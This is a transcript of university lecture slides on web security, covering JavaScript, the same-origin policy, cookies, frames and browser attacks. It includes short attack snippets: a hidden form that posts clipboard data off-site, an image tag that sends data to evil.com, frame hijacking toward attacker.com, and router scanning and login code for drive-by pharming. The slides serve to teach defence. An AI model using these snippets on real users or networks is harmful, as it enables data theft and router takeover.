JavaScript and Same Origin Policy - PowerPoint PPT Presentation

1 / 72
About This Presentation
Title:

JavaScript and Same Origin Policy

Description:

* Browser ... overrun associated with an HTML directive Could be used by hackers to run malicious code on a user's system Scripting vulnerability ... – PowerPoint PPT presentation

Number of Views:416
Avg rating:3.0/5.0
Slides: 73
Provided by: VitalySh8
Category:

less

Transcript and Presenter's Notes

Title: JavaScript and Same Origin Policy


1
JavaScript andSame Origin Policy
CS 378
  • Vitaly Shmatikov
  • (most slides from the Stanford Web security group)

2
Browser and Network
Network
request
Browser
website
reply
OS
Hardware
3
Two Sides of Web Security
  • Web browser
  • Can be attacked by any website it visits
  • Attacks can lead to document theft, loss of
    private data, malware installation (keyloggers,
    botnets)
  • Web application
  • Runs at website
  • Banks, online merchants, blogs, Google Apps, many
    others
  • Written in PHP, ASP, JSP, Ruby,
  • Many potential bugs XSS, XSRF, SQL injection
  • Attacks can lead to stolen customer information,
    defaced sites, mayhem

4
Web Attacker
  • Controls malicious website (attacker.com)
  • Can even obtain a SSL/TLS certificate for his
    site (0)
  • User visits attacker.com why?
  • Phishing email, enticing content, search results,
    placed by ad network, blind luck
  • Attackers Facebook app
  • Attacker has no other access to user machine!
  • Variation gadget attacker
  • Bad gadget included in an otherwise honest mashup

5
Web Threat Models
  • Web attacker
  • Network attacker
  • Passive wireless eavesdropper
  • Active evil router, DNS poisoning
  • Malware attacker
  • Malicious code executes directly on victims
    computer
  • To infect victims computer, can exploit software
    bugs (e.g., buffer overflow) or convince user to
    install malicious content (how?)
  • Masquerade as an antivirus program, video codec,
    etc.

6
Dangerous Websites
  • Web patrol study at Microsoft identified 752
    unique URLs that could successfully exploit
    unpatched Windows XP machines
  • Many are interlinked by redirection and
    controlled by the same major players
  • But I never visit risky websites
  • 11 exploit pages are among top 10,000 most
    visited
  • Trick put up a page with popular content, get
    into search engines, page then redirects to the
    exploit site
  • One of the malicious sites was providing exploits
    to 75 innocuous sites focusing on (1)
    celebrities, (2) song lyrics, (3) wallpapers, (4)
    video game cheats, and (5) wrestling

7
The Ghost in the Browser
  • Browsers contain exploitable bugs like any other
    software
  • Often enable remote code execution by websites
  • Google 2007 study (The Ghost in the Browser)
    found Trojan binaries on 300,000 web pages
  • Even if browsers were bug-free, still lots of
    vulnerabilities in Web applications
  • XSS, XSRF, SQL injection

8
February 12, 2002
  • Microsoft Issues New IE Browser Security Patch
    By Richard Karpinski
  • Microsoft has released a security patch that
    closes some major holes in its Internet Explorer
    browser
  • The so-called "cumulative patch" fixes six
    different IE problems
  • Affected browsers include Internet Explorer 5.01,
    5.5 and 6.0
  • Microsoft rated the potential security breaches
    as "critical"

9
Fixed by the February 2002 Patch
  • Buffer overrun associated with an HTML directive
  • Could be used by hackers to run malicious code on
    a user's system
  • Scripting vulnerability
  • Lets an attacker read files on a user's system
  • Vulnerability related to the display of file
    names
  • Hackers could misrepresent the name of a file and
    trick a user into downloading an unsafe file
  • and many more

On April 13, 2004, MS announced 20 new
vulnerabilities
10
October 12, 2004
  • Microsoft Security Bulletin MS04-038
  • If a user is logged on with administrative
    privileges, an attacker who successfully
    exploited the most severe of these
    vulnerabilities could take complete control of an
    affected system, including installing programs
    viewing, changing, or deleting data or creating
    new accounts with full privileges. Microsoft
    recommends that customers install the update
    immediately.
  • Cascading Style Sheets (CSS) Heap Critical
  • Memory Corruption Vulnerability
  • Similar Method Name Redirection Critical
  • Cross Domain Vulnerability
  • Install Engine Vulnerability Critical
  • SSL Caching Vulnerability Moderate
  • Aggregate Severity of All Vulnerabilities Critica
    l

11
December 13, 2005
  • Microsoft Security Bulletin MS05-054
  • If a user is logged on with administrative
    user rights, an attacker who successfully
    exploited the most severe of these
    vulnerabilities could take complete control of an
    affected system. An attacker could then install
    programs view, change, or delete data or create
    new accounts with full user rights. We
    recommend that customers apply the update
    immediately.
  • File Download Dialog Box Manipulation
    Vulnerability Moderate
  • HTTPS Proxy Vulnerability Moderate
  • COM Object Instantiation Memory Corruption
    Vulnerability Critical
  • Mismatched Document Object Model
    Objects Critical
  • Memory Corruption Vulnerability
  • Aggregate Severity of All Vulnerabilities Critica
    l

12
January 7, 2007
  • Microsoft Security Bulletin MS07-004
  • A remote code execution vulnerability exists in
    the Vector Markup Language (VML) implementation
    in Microsoft Windows. An attacker could exploit
    the vulnerability by constructing a specially
    crafted Web page or HTML e-mail that could
    potentially allow remote code execution if a user
    visited the Web page or viewed the message. An
    attacker who successfully exploited this
    vulnerability could take complete control of an
    affected system.
  • Maximum Severity Rating Critical
  • Recommendation Customers should apply the update
    immediately

13
August 14, 2007
  • Microsoft Security Bulletin MS07-050
  • This security update resolves a privately
    reported vulnerability in the Vector Markup
    Language (VML) implementation in Windows. The
    vulnerability could allow remote code execution
    if a user viewed a specially crafted Web page
    using Internet Explorer.
  • Maximum Severity Rating Critical
  • Recommendation Customers should apply the update
    immediately

14
December 17, 2008
  • Microsoft Security Bulletin MS08-078
  • This security update resolves a publicly
    disclosed vulnerability. The vulnerability could
    allow remote code execution if a user views a
    specially crafted Web page using Internet
    Explorer.
  • Maximum Severity Rating Critical
  • Recommendation Microsoft recommends that
    customers apply the update immediately.

15
Many Other Vulnerabilities
  • Check out http//www.microsoft.com/technet/securit
    y/
  • 49 critical updates related to Internet
    Explorer 6.0 between Oct 10, 2001, and Aug 14,
    2007

16
OS vs. Browser Analogies
Operating system
Web browser
  • Primitives
  • System calls
  • Processes
  • Disk
  • Principals Users
  • Discretionary access control
  • Vulnerabilities
  • Buffer overflow
  • Root exploit
  • Primitives
  • Document object model
  • Frames
  • Cookies / localStorage
  • Principals Origins
  • Mandatory access control
  • Vulnerabilities
  • Cross-site scripting
  • Universal scripting

17
ActiveX
  • ActiveX controls are compiled binaries
  • Downloaded and installed, like any other
    executable
  • ActiveX controls reside on client's machine
  • Activated by HTML object tag on the page
  • Run as binaries, not interpreted by browser
  • Security model relies on three components
  • Digital signatures to verify the source of the
    control
  • Browser policy can reject controls from network
    zones
  • Controls can be marked by author as safe for
    initialization or safe for scripting
  • Once accepted, installed and started, no control
    over execution!

18
Installing ActiveX Controls
If you install and run, no further control over
the code, same access as any other program you
installed
19
ActiveX Risks
  • From MSDN
  • An ActiveX control can be an extremely insecure
    way to provide a feature. Because it is a
    Component Object Model (COM) object, it can do
    anything the user can do from that computer. It
    can read from and write to the registry, and it
    has access to the local file system. From the
    moment a user downloads an ActiveX control, the
    control may be vulnerable to attack because any
    Web application on the Internet can repurpose it,
    that is, use the control for its own ends whether
    sincere or malicious.
  • How can a control be repurposed?
  • Once installed, control can be accessed by any
    page that knows its class identifier (CLSID), by
    using HTML object tag embedded in the page

20
IE Browser Helper Objects
  • COM components loaded when IE starts up
  • Run as if they were part of the browser
  • Perform any action on IE windows and modules
  • Detect browser events
  • GoBack, GoForward, DocumentComplete
  • Access browser menu, toolbar and make changes
  • Create windows to display information (or ads!!)
  • Install hooks to monitor messages and actions
  • There is no protection from extensions
  • Spyware writers favorite!
  • Try running HijackThis on your computer

21
Browser Basic Execution Model
  • Each browser window or frame
  • Loads content
  • Renders
  • Processes HTML and scripts to display the page
  • May involve images, subframes, etc.
  • Responds to events
  • Events
  • User actions OnClick, OnMouseover
  • Rendering OnLoad, OnUnload
  • Timing setTimeout(), clearTimeout()

22
HTML and Scripts
Browser receives content, displays HTML and
executes scripts
  • lthtmlgt
  • ltpgt The script on this page adds two numbers
  • ltscriptgt
  • var num1, num2, sum
  • num1 prompt("Enter first number")
  • num2 prompt("Enter second number")
  • sum parseInt(num1) parseInt(num2)
  • alert("Sum " sum)
  • lt/scriptgt
  • lt/htmlgt

23
(No Transcript)
24
Event-Driven Script Execution
Script defines a page-specific function
ltscript type"text/javascript"gt function
whichButton(event) if (event.button1)
alert("You clicked the left mouse button!")
else alert("You clicked the right mouse
button!") lt/scriptgt ltbody
onmousedown"whichButton(event)"gt lt/bodygt
Function gets executed when some event happens
25
(No Transcript)
26
JavaScript
  • The worlds most misunderstood programming
    language
  • Language executed by browser
  • Scripts are embedded in Web pages
  • Can run before HTML is loaded, before page is
    viewed, while it is being viewed or when leaving
    the page
  • Used to implement active web pages
  • AJAX, huge number of Web-based applications
  • Potentially malicious website gets to execute
    some code on users machine

27
JavaScript History
  • Developed by Brendan Eich at Netscape
  • Scripting language for Navigator 2
  • Later standardized for browser compatibility
  • ECMAScript Edition 3 (aka JavaScript 1.5)
  • Related to Java in name only
  • Name was part of a marketing deal
  • Java is to JavaScript as car is to carpet
  • Various implementations available
  • SpiderMonkey, RhinoJava, others

28
Common Uses of JavaScript
  • Form validation
  • Page embellishments and special effects
  • Navigation systems
  • Dynamic content manipulation
  • Hundreds of applications
  • Dashboard widgets in Mac OS X, Google Maps,
    Philips universal remotes, Writely word processor

29
JavaScript in Web Pages
  • Embedded in HTML page as ltscriptgt element
  • JavaScript written directly inside ltscriptgt
    element
  • ltscriptgt alert("Hello World!") lt/scriptgt
  • Linked file as src attribute of the ltscriptgt
    element
  • ltscript type"text/JavaScript" srcfunctions.js"gt
    lt/scriptgt
  • Event handler attribute
  • lta href"http//www.yahoo.com" onmouseover"alert(
    'hi')"gt
  • Pseudo-URL referenced by a link
  • lta hrefJavaScript alert(You clicked)gtClick
    melt/agt

30
Document Object Model (DOM)
  • HTML page is structured data
  • DOM is object-oriented representation of the
    hierarchical HTML structure
  • Properties document.alinkColor, document.URL,
    document.forms , document.links ,
  • Methods document.write(document.referrer)
  • These change the content of the page!
  • Also Browser Object Model (BOM)
  • Window, Document, Frames, History, Location,
    Navigator (type and version of browser)

31
Browser and Document Structure
W3C standard differs from models supported in
existing browsers
32
Reading Properties with JavaScript
Sample HTML
  • Sample script
  • Example 1 returns "ul"
  • Example 2 returns "null"
  • Example 3 returns "li"
  • Example 4 returns "text"
  • A text node below the "li" which holds the actual
    text data as its value
  • Example 5 returns " Item 1 "

ltul id"t1"gt ltligt Item 1 lt/ligt lt/ulgt
1. document.getElementById('t1').nodeName 2.
document.getElementById('t1').nodeValue 3.
document.getElementById('t1').firstChild.nodeName
4. document.getElementById('t1').firstChild.firstC
hild.nodeName 5. document.getElementById('t1').fir
stChild.firstChild.nodeValue
33
Page Manipulation with JavaScript
Sample HTML
  • Some possibilities
  • createElement(elementName)
  • createTextNode(text)
  • appendChild(newChild)
  • removeChild(node)
  • Example add a new list item

ltul id"t1"gt ltligt Item 1 lt/ligt lt/ulgt
var list document.getElementById('t1') var
newitem document.createElement('li') var
newtext document.createTextNode(text)
list.appendChild(newitem) newitem.appendChild(new
text)
34
Stealing Clipboard Contents
  • Create hidden form, enter clipboard contents,
    post form

ltFORM name"hf" METHODPOST ACTION
"http//www.site.com/targetpage.php"
style"displaynone"gt    ltINPUT TYPE"text"
NAME"topicID"gt    ltINPUT TYPE"submit"gt lt/FORMgt
ltscript language"javascript"gt    var content
clipboardData.getData("Text")    document.forms"
hf".elements"topicID".value content
   document.forms"hf".submit() lt/scriptgt
35
Content Comes from Many Sources
  • Frames
  • ltiframe src//site.com/frame.htmlgt lt/iframegt
  • Scripts
  • ltscript src//site.com/script.jsgt lt/scriptgt
  • Stylesheets (CSS)
  • ltlink relstylesheet type"text/css
    href//site.com/theme.css" /gt
  • Objects (Flash) - using swfobject.js script
  • ltscriptgt var so new SWFObject(//site.com/flash.
    swf', )
  • so.addParam(allowscriptaccess',
    always')
  • so.write('flashdiv')
  • lt/scriptgt

Allows Flash object to communicate with external
scripts, navigate frames, open windows
36
Browser Sandbox
  • Goal safely execute JavaScript code
  • provided by a remote website
  • No direct file access, limited access to OS,
    network, browser data, content that came from
    other websites
  • Same-origin policy
  • Can only read properties of documents and windows
    from the same domain, protocol, and port
  • User can grant privileges to signed scripts
  • UniversalBrowserRead/Write, UniversalFileRead,
    UniversalSendMail

37
Same Origin Policy (High Level)
  • Same Origin Policy (SOP) for DOM
  • Origin A can access origin Bs DOM if A and B
    have same (scheme, domain, port)
  • Same Origin Policy (SOP) for cookies
  • Generally, based on(scheme, domain, path)

scheme//domainport/path?params
38
Setting Cookies by Server
GET
Server
Browser
HTTP Header Set-cookie NAMEVALUE domain
(when to send) path (when to
send) secure (only send over
HTTPS) expires (when expires) HttpOnly
if expiresNULL this session only
  • Delete cookie by setting expires to date in
    past
  • Default scope is domain and path of setting URL

39
Viewing Cookies in Browser
40
Name, Domain, Path
Cookies are identified by (name, domain, path)
cookie 1 name userid value test domain
login.site.com path / secure
cookie 2 name userid value test123 domain
.site.com path / secure
distinct cookies
  • Both cookies stored in browsers cookie jar,
  • both are in scope of login.site.com

41
SOP for Writing Cookies
  • domain any domain suffix of URL-hostname,
  • except top-level domain (TLD)
  • Which cookies can be set by
    login.site.com?
  • login.site.com can set cookies for all
    of .site.com but not for another site or TLD
  • Problematic for sites like .utexas.edu
  • path anything

allowed domains login.site.com .site.com
disallowed domains user.site.com othersite.com .co
m
?
?
?
?
?
42
SOP for Reading Cookies
GET //URL-domain/URL-path Cookie NAME VALUE
Server
Browser
  • Browser sends all cookies in URL scope
  • cookie-domain is domain-suffix of URL-domain
  • cookie-path is prefix of URL-path
  • protocolHTTPS if cookie is secure
  • Goal server only sees cookies in its scope

43
Examples of Cookie Reading SOP
cookie 1 name userid value u1 domain
login.site.com path / secure
cookie 2 name userid value u2 domain
.site.com path / non-secure
both set by login.site.com
  • http//checkout.site.com/
  • http//login.site.com/
  • https//login.site.com/

cookie useridu2 cookie useridu2 cookie
useridu1 useridu2
(arbitrary order in FF3 most specific first)
44
SOP for JavaScript in the Browser
  • Same scope rules as server-side
  • document.cookie returns a string with all cookies
    available for document
  • Example alert(document.cookie)
  • Based on protocol, domain, path
  • Often used in JavaScript to customize page
  • Setting a cookie in Javascript
  • document.cookie namevalue expires
  • Deleting a cookie
  • document.cookie name expires Thu,
    01-Jan-70

45
Cookie Protocol Issues
  • What does the server know about the cookie sent
    to it by the browser?
  • Server only sees Cookie NameValue
  • does not see cookie attributes (e.g.,
    secure)
  • does not see which domain set the cookie
  • RFC 2109 (cookie RFC) has an option for including
    domain, path in Cookie header, but not supported
    by browsers

46
Who Set The Cookie?
  • Alice logs in at login.site.com
  • login.site.com sets session-id cookie for
    .site.com
  • Alice visits evil.site.com
  • Overwrites .site.com session-id cookie with
    session-id of user badguy - not a violation of
    SOP! (why?)
  • Alice visits cs378.site.com to submit homework
  • cs378.site.com thinks it is talking to badguy
  • Problem cs378.site.com expects session-id from
    login.site.com, cannot tell that session-id
    cookie has been overwritten by a sibling domain

47
Path Separation Is Not Secure
  • Cookie SOP path separation
  • x.com/A does not receive cookies of
    x.com/B
  • This is done for efficiency, not security!
  • DOM SOP no path separation
  • x.com/A can read DOM of x.com/B
  • ltiframe srcx.com/B"gtlt/iframegt
  • alert(frames0.document.cookie)

48
Secure Cookies Are Not Secure
  • Alice logs in at https//www.google.com
    https//www.google.com/accounts
  • Alice visits http//www.google.com
  • Automatically, due to the phishing filter
  • Network attacker can inject into response
  • Set-Cookie LSIDbadguy secure
  • and overwrite secure cookie

LSID, GAUSR are secure cookies
49
SideJacking
  • Eavesdropping on a wireless network to steal
    other users cookies
  • SSL/TLS does not always help!
  • Laptop sees WiFi hotspot, tries HTTPS to Gmail
  • This fails because first sees hotspots welcome
    page
  • Now try HTTP with unencrypted cookie attached!
  • Eavesdropper gets the cookie users Gmail is
    pwned!
  • Typical website uses HTTPS for login, the rest
    of the session is unencrypted
  • Stealing cookie and/or session id enough to take
    over users Web mail, Facebook, Amazon,

50
Surf Jacking (HTTPS will not save you)
http//resources.enablesecurity.com/resources/Surf
20Jacking.pdf
  • Victim logs into https//bank.com using HTTPS
  • Cookie sent back encrypted and stored by browser
  • Victim visits http//foo.com in another window
  • Network attacker sends 301 Moved Permanently in
    response to cleartext request to foo.com
  • Response contains header Location
    http//bank.com
  • Browser thinks foo.com is redirected to bank.com
  • Browser starts a new HTTP connection to bank.com,
    sends cookie in the clear
  • Network attacker gets the cookie!

51
Flash
  • HTTP cookies max 4K, can delete from browser
  • Flash cookies / LSO (Local Shared Object)
  • Up to 100K
  • No expiration date
  • Cannot be deleted by browser user
  • Flash language supports XMLSockets
  • Can only access high ports in Flash apps domain
  • Scenario malicious Flash game, attacker runs a
    proxy on a high port on the game-hosting site
    Consequences?

52
SOP Often Misunderstood
  • Often simply stated as same-origin policy
  • This usually just refers to the canScript
    relation can script from origin A access content
    from origin B?
  • Full policy of current browsers is complex
  • Evolved via penetrate-and-patch
  • Different features evolved slightly different
    policies
  • Common scripting and cookie policies
  • canScript considers scheme, domain, port
  • canReadCookie considers scheme, domain, path
  • canWriteCookie considers host

53
Frame and iFrame
  • Window may contain frames from different sources
  • Frame rigid division as part of frameset
  • iFrame floating inline frame
  • Why use frames?
  • Delegate screen area to content from another
    source
  • Browser provides isolation based on frames
  • Parent may work even if frame is broken

ltIFRAME SRC"hello.html" WIDTH450 HEIGHT100gt
If you can see this, your browser doesn't
understand IFRAME. lt/IFRAMEgt
54
Browser Security Policy for Frames
  • canScript(A,B)
  • Can Frame A execute a script that manipulates
    arbitrary/nontrivial DOM elements of Frame B?
  • canNavigate(A,B)
  • Can Frame A change where the content for Frame B
    comes from?
  • readCookie(A,S), writeCookie(A,S)
  • Can Frame A read/write cookies from site S?

55
Mashups
56
iGoogle
57
Cross-Frame Scripting
  • Frame A can execute a script that manipulates
    arbitrary DOM elements of Frame B only if
    Origin(A) Origin(B)
  • Basic same origin policy, where origin is the
    scheme, domain, and port from which the frame was
    loaded
  • Some browsers allow any frame to navigate any
    other frame
  • Navigate change where the content in the frame
    is loaded from

58
Frame SOP Examples
  • Suppose the following HTML is hosted at site.com
  • Disallowed access
  • ltiframe src"http//othersite.com"gtlt/iframegt
  • alert( frames0.contentDocument.body.innerHTML )
  • alert( frames0.src )
  • Allowed access
  • ltimg src"http//othersite.com/logo.gif"gt
  • alert( images0.height )
  • or
  • frames0.location.href http//mysite.com/

Navigating child frame is allowed, but reading
frame0.src is not
59
Guninski Attack
awglogin
If bad frame can navigate good frame, attacker
gets password!
60
Gadget Hijacking in Mashups
top.frames1.location "http/www.attacker.com/.
.. top.frames2.location "http/www.attacker.
com/... ...
61
Gadget Hijacking
Modern browsers only allow a frame to navigate
its enclosed frames
62
Recent Developments
Site B
Site A
  • Cross-origin network requests
  • Access-Control-Allow-Origin
  • ltlist of domainsgt
  • Access-Control-Allow-Origin
  • Cross-origin client-side communication
  • Client-side messaging via navigation (older
    browsers)
  • postMessage (newer browsers)

Site A context
Site B context
63
Library Import
  • Same-origin policy does not apply to scripts
    loaded in enclosing frame from arbitrary site
  • This script has privileges of A.com, not source
    server
  • Can script other pages from A.com origin, load
    more scripts
  • Other forms of importing

ltscript type"text/javascript" srchttps//seal.v
erisign.com/getseal?host_nameA.comgt lt/scriptgt
VeriSign
64
SOP Does Not Control Sending
  • Same-origin policy (SOP) controls access to DOM
  • Active content (scripts) can send anywhere!
  • No user involvement required
  • Can only read response from same origin

65
Sending a Cross-Domain GET
  • Data must be URL encoded
  • ltimg src"http//othersite.com/file.cgi?foo1bar
    x y"gt
  • Browser sends
  • GET file.cgi?foo1barx20y HTTP/1.1 to
    othersite.com
  • Cant send to some restricted ports
  • For example, port 25 (SMTP)
  • Can use GET for denial of service (DoS) attacks
  • A popular site can DoS another site Puppetnets

66
Using Images to Send Data
  • Communicate with other sites
  • ltimg srchttp//evil.com/pass-local-information.j
    pg?extra_informationgt
  • Hide resulting image
  • ltimg src height1" width1"gt

Very important point a web page can send
information to any site!
67
Drive-By Pharming
Stamm et al.
  • User is tricked into visiting a malicious site
  • Malicious script detects victims address
  • Socket back to malicious host, read sockets
    address
  • Next step reprogram the router

68
Port Scanning Behind Firewall
  • Request images from internal IP addresses
  • Example ltimg src192.168.0.48080/gt
  • Use timeout/onError to determine success/failure
  • Fingerprint webpages using known image names

Malicious webpage
Server
Browser
Firewall
69
Finding the Router
Stamm et al.
  • Script from malicious site can scan home network
    without violating same-origin policy!
  • Pretend to fetch an image from an IP address
  • Detect success using onError
  • ltIMG SRC192.168.0.1 onError do()gt
  • Determine router type by the image it serves

Basic JavaScript function, triggered when error
occurs loading a document or an image can have a
handler
70
JavaScript Timing Code (Sample)
lthtmlgtltbodygtltimg id"test" style"display
none"gt ltscriptgt var test document.getElement
ById(test) var start new Date()
test.onerror function() var end
new Date() alert("Total time " (end
- start)) test.src
"http//www.example.com/page.html" lt/scriptgt lt/bo
dygtlt/htmlgt
  • When response header indicates that page is not
    an image, the browser stops and notifies
    JavaScript via the onError handle

71
Reprogramming the Router
Stamm et al.
  • Fact 50 of home users use a broadband router
  • with a default or no password
  • Log into router
  • ltscript srchttp//adminpassword_at_192.168.0.1
    gtlt/scriptgt
  • Replace DNS server address with address of
    attacker-controlled DNS server

72
Risks of Drive-By Pharming
Stamm et al.
  • Complete 0wnership of victims Internet cnxn
  • Undetectable phishing user goes to a financial
    site, attackers DNS gives IP of attackers site
  • Subvert anti-virus updates, etc.
Write a Comment
User Comments (0)
About PowerShow.com